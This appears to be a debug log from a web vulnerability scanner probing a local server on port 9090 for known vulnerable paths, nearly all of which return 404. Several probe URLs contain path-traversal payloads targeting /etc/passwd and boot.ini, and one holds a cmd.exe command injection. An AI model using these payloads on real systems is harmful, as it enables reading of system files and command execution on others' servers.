(id=24674,from_cache=0,grep=1,rtt=0.19,did=f5XQBa1l) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/modif_infos.asp?n=/.../.../.../.../.../.../boot.ini returned HTTP code "404" (id=24676,from_cache=0,grep=1,rtt=0.08,did=F629gAeL) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/cgi-bin/ls returned HTTP code "404" (id=24675,from_cache=0,grep=1,rtt=0.09,did=mv9icJEq) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/dms0 returned HTTP code "404" (id=24679,from_cache=0,grep=1,rtt=0.18,did=FR9Fmu6H) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/mojo/mojo.cgi returned HTTP code "404" (id=24680,from_cache=0,grep=1,rtt=0.13,did=73FkKwhJ) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/scripts/tradecli.dll?template=nonexistfile?template=..\\..\\..\\..\\..\\winnt\\system32\\cmd.exe?/c dir returned HTTP code "404" (id=24683,from_cache=0,grep=1,rtt=0.09,did=vT4dfEc9) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/csNews.cgi returned HTTP code "404" (id=24690,from_cache=0,grep=1,rtt=0.15,did=BciiHLYz) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4521. [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/test/jsp/buffer3.jsp returned HTTP code "404" (id=24668,from_cache=0,grep=1,rtt=0.10,did=sONQS7kx) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/technote/print.cgi returned HTTP code "404" (id=24677,from_cache=0,grep=1,rtt=0.19,did=kI3hdayB) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum-ra_professionnel.asp?n=/../../../etc/passwd returned HTTP code "404" (id=24672,from_cache=0,grep=1,rtt=0.12,did=Bw2jZJn1) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/protection.php returned HTTP code "404" (id=24686,from_cache=0,grep=1,rtt=0.20,did=dZdSflpc) [Wed Feb 12 10:04:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13037, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4959} [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/bin/fpadmin.htm returned HTTP code "404" (id=24689,from_cache=0,grep=1,rtt=0.05,did=v1E2FVfL) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2446. [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/_vti_pvt/doctodep.btr returned HTTP code "404" (id=24681,from_cache=0,grep=1,rtt=0.18,did=YDdvBCBp) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/_vti_pvt/authors.pwd returned HTTP code "404" (id=24684,from_cache=0,grep=1,rtt=0.02,did=bfjmPyY4) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/_private/orders.htm returned HTTP code "404" (id=24682,from_cache=0,grep=1,rtt=0.13,did=FquY01RD) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum1_professionnel.asp?n=1771&=&=&nn=/../../../../../../../../etc/passwd&page=1 returned HTTP code "404" (id=24685,from_cache=0,grep=1,rtt=0.10,did=Tfe3tHam) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/_vti_bin/CGImail.exe returned HTTP code "404" (id=24687,from_cache=0,grep=1,rtt=0.09,did=sVxkPODq) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum1_professionnel.asp?n=1771&=&=&nn=100&page=/../../../../../../../../../../etc/passwd returned HTTP code "404" (id=24688,from_cache=0,grep=1,rtt=0.06,did=W42LCpyw) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/webcalendar/view_m.php returned HTTP code "404" (id=24691,from_cache=0,grep=1,rtt=0.10,did=fwDSpmXu) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4521. [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2447. [Wed Feb 12 10:04:35 2020 - debug] url_session.grep(uri="http://localhost:9090/News/") took 0.01s to run [Wed Feb 12 10:04:35 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] objects.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] error_500.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/profile.cgi returned HTTP code "404" (id=24692,from_cache=0,grep=1,rtt=0.04,did=zoUp6Mwh) [Wed Feb 12 10:04:35 2020 - debug] password_profiling.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] click_jacking.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24693,from_cache=0,grep=1,rtt=0.21,did=3KgXwIHj) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2448. [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4522. [Wed Feb 12 10:04:35 2020 - debug] lang.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/imprimer.asp?no=/.\\"./.\\"./.\\"./.\\"./.\\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24600,from_cache=0,grep=1,rtt=0.21,did=ifVcTrws) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/scripts/admin.pl returned HTTP code "404" (id=24695,from_cache=0,grep=1,rtt=0.12,did=hLEpTVBt) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/poppassd.php3 returned HTTP code "404" (id=24696,from_cache=0,grep=1,rtt=0.06,did=ge1lak2Z) [Wed Feb 12 10:04:35 2020 - debug] meta_tags.grep(uri="http://localhost:9090/News/") took 0.05s to run [Wed Feb 12 10:04:35 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] strange_reason.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] cache_control.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] strange_headers.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] ssn.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] oracle.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] feeds.grep(uri="http://localhost:9090/News/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/test/jsp/pageInfo.jsp returned HTTP code "404" (id=24694,from_cache=0,grep=1,rtt=0.11,did=dhGTQdhd) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2449. [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4523. [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/examples/header returned HTTP code "404" (id=24697,from_cache=0,grep=1,rtt=0.08,did=ttqXu32w) [Wed Feb 12 10:04:35 2020 - debug] error_pages.grep(uri="http://localhost:9090/News/") took 0.02s to run [Wed Feb 12 10:04:35 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/News/") took 0.05s to run [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2450. [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2451. [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2452. [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2453. [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24699,from_cache=0,grep=1,rtt=0.03,did=2OSRov3g) [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2454. [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/.pinerc returned HTTP code "404" (id=24698,from_cache=0,grep=1,rtt=0.10,did=C0XWxvHt) [Wed Feb 12 10:04:36 2020 - debug] symfony.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] motw.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] meta_generator.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] retirejs.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] private_ip.grep(uri="http://localhost:9090/book/") took 0.01s to run [Wed Feb 12 10:04:36 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:36 2020 - debug] serialized_object.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] blank_body.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] svn_users.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] localhost:9090 connection pool stats (free:314 / in_use:2 / max:50 / total:316) [Wed Feb 12 10:04:36 2020 - debug] Connections with more in use time: (6b4a0bc2143524ec, 0.06 sec) (1755b9afa6833dbb, 0.05 sec) [Wed Feb 12 10:04:36 2020 - debug] expect_ct.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] file_upload.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] credit_cards.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] websockets_links.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] dom_xss.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] keys.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] clamav.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] vulners_db.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] csp.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] objects.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] error_500.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] meta_tags.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] password_profiling.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] click_jacking.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] lang.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] url_session.grep(uri="http://localhost:9090/book/") took 0.03s to run [Wed Feb 12 10:04:36 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2455. [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/forum_professionnel.asp?n=c:\\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24701,from_cache=0,grep=1,rtt=0.02,did=KOdae5ru) [Wed Feb 12 10:04:36 2020 - debug] error_pages.grep(uri="http://localhost:9090/book/") took 0.03s to run [Wed Feb 12 10:04:36 2020 - debug] strange_reason.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] cache_control.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] strange_headers.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/.htaccess.old returned HTTP code "404" (id=24706,from_cache=0,grep=1,rtt=0.04,did=Rk6ULJKN) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/url.jsp returned HTTP code "404" (id=24707,from_cache=0,grep=1,rtt=0.05,did=bclUaD8W) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/clickresponder.pl returned HTTP code "404" (id=24708,from_cache=0,grep=1,rtt=0.04,did=EhuSB5JP) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/livredor/index.php returned HTTP code "404" (id=24709,from_cache=0,grep=1,rtt=0.12,did=tq1UmyiI) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/ezshopper2/loadpage.cgi returned HTTP code "404" (id=24710,from_cache=0,grep=1,rtt=0.10,did=mTLqGMqL) [Wed Feb 12 10:04:36 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13060, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4961} [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/com/novell/webpublisher/help/en/default.htm returned HTTP code "404" (id=24713,from_cache=0,grep=1,rtt=0.14,did=Ad8F0F7S) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found= returned HTTP code "404" (id=24711,from_cache=0,grep=1,rtt=0.13,did=LkqPEe93) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/adduser.cgi returned HTTP code "404" (id=24703,from_cache=0,grep=1,rtt=0.09,did=ZCKNNpbu) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/bb-replog.sh returned HTTP code "404" (id=24714,from_cache=0,grep=1,rtt=0.14,did=XbDFMBzL) [Wed Feb 12 10:04:36 2020 - debug] localhost:9090 connection pool stats (free:311 / in_use:7 / max:50 / total:318) [Wed Feb 12 10:04:36 2020 - debug] Connections with more in use time: (9795101224d5e47b, 0.25 sec) (1f2fc9040aaeca7e, 0.18 sec) (1d8760f7cff61578, 0.13 sec) (d29bc77ff21c35c7, 0.06 sec) (16e77bf618b0b428, 0.05 sec) [Wed Feb 12 10:04:36 2020 - debug] ssn.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/netget?sid=Safety&=&=&msg=2002&file=Safety returned HTTP code "404" (id=24702,from_cache=0,grep=1,rtt=0.07,did=Mm98o2EJ) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/instaboard/index.cfm returned HTTP code "404" (id=24712,from_cache=0,grep=1,rtt=0.13,did=l7s5I4w2) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/members/ID.xbb returned HTTP code "404" (id=24705,from_cache=0,grep=1,rtt=0.15,did=7STqxqlh) [Wed Feb 12 10:04:36 2020 - debug] oracle.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] feeds.grep(uri="http://localhost:9090/book/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/Site/biztalkhttpreceive.dll returned HTTP code "404" (id=24704,from_cache=0,grep=1,rtt=0.08,did=Ae0f9D4k) [Wed Feb 12 10:04:36 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/modules/WebChat/quit.php returned HTTP code "404" (id=24716,from_cache=0,grep=1,rtt=0.01,did=LOADeQ0o) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/csPassword.cgi returned HTTP code "404" (id=24719,from_cache=0,grep=1,rtt=0.03,did=9SJpM6yq) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/security/web_access.html returned HTTP code "404" (id=24720,from_cache=0,grep=1,rtt=0.10,did=xvIuSfgI) [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2456. [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/forum1_professionnel.asp?n=1771&=&=&nn=/.\\"./.\\"./.\\"./.\\"./.\\"./boot.ini&page=1 returned HTTP code "404" (id=24721,from_cache=0,grep=1,rtt=0.06,did=dzn0Gcz1) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/WebSphereSamples returned HTTP code "404" (id=24722,from_cache=0,grep=1,rtt=0.12,did=kjWKCgsF) [Wed Feb 12 10:04:36 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/pls/simpledad/admin_/gateway.htm?schema=sample returned HTTP code "404" (id=24717,from_cache=0,grep=1,rtt=0.06,did=ath0eQNI) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/cgi-bin/sws/manager.pl returned HTTP code "404" (id=24718,from_cache=0,grep=1,rtt=0.12,did=ZUh78fhP) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini returned HTTP code "404" (id=24715,from_cache=0,grep=1,rtt=0.14,did=dB2IhDbu) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/_vti_pvt/service.pwd returned HTTP code "404" (id=24723,from_cache=0,grep=1,rtt=0.15,did=lHzyVgLo) [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/bin/fpremadm.exe returned HTTP code "404" (id=24725,from_cache=0,grep=1,rtt=0.07,did=Ha90PwN0) [Wed Feb 12 10:04:36 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/book/") took 0.16s to run [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/test/jsp/buffer4.jsp returned HTTP code "404" (id=24724,from_cache=0,grep=1,rtt=0.20,did=Eqb65CJs) [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4523. [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2457. [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2458. [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2459. [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/webmail/lib/emailreader_execute_on_each_page.inc.php returned HTTP code "404" (id=24726,from_cache=0,grep=1,rtt=0.15,did=S9b7oPc3) [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2460. [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2461. [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found= returned HTTP code "404" (id=24728,from_cache=0,grep=1,rtt=0.05,did=lsJGZGT6) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/_private/orders.txt returned HTTP code "404" (id=24727,from_cache=0,grep=1,rtt=0.59,did=fWL8oAjc) [Wed Feb 12 10:04:36 2020 - debug] symfony.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] motw.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] meta_generator.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] retirejs.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] file_upload.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:36 2020 - debug] serialized_object.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] blank_body.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] credit_cards.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] websockets_links.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] csp.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] dom_xss.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] keys.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] svn_users.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] clamav.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] private_ip.grep(uri="http://localhost:9090/03/") took 0.04s to run [Wed Feb 12 10:04:36 2020 - debug] expect_ct.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4523. [Wed Feb 12 10:04:36 2020 - debug] vulners_db.grep(uri="http://localhost:9090/03/") took 0.13s to run [Wed Feb 12 10:04:36 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] objects.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] error_500.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] meta_tags.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] password_profiling.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] click_jacking.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] HEAD http://localhost:9090/index.html.fr returned HTTP code "404" (id=24729,from_cache=0,grep=1,rtt=0.71,did=52q6dWc3) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse= returned HTTP code "404" (id=24730,from_cache=0,grep=1,rtt=0.73,did=kE5g5qlq) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/forum_professionnel.asp?n=../../../../../../../../../etc/passwd\x00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24734,from_cache=0,grep=1,rtt=0.04,did=XKOn2vJ0) [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/jspdocs/ returned HTTP code "404" (id=24735,from_cache=0,grep=1,rtt=0.78,did=Bq1s7Xn6) [Wed Feb 12 10:04:36 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13084, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4962} [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/data/config/microsrv.cfg returned HTTP code "404" (id=24736,from_cache=0,grep=1,rtt=0.04,did=hOlgANFR) [Wed Feb 12 10:04:36 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13084, 'reject-seen-url': 5838, 'reject-out-of-scope': 216, 'accept': 4962} [Wed Feb 12 10:04:36 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2462. [Wed Feb 12 10:04:36 2020 - debug] lang.grep(uri="http://localhost:9090/03/") took 0.00s to run [Wed Feb 12 10:04:36 2020 - debug] GET http://localhost:9090/test/jsp/pageInvalid.jsp returned HTTP code "404" 